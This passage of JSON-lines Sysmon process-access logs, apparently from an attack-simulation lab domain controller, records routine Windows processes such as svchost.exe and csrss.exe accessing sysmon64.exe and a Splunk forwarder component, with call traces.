Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6546,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21DE-5F25-0000-00103B270A00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21DE-5F25-0000-00103B270A00}","TargetProcessId":"3268","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6547,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6548,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6549,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6550,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6551,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6552,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6553,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6554,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 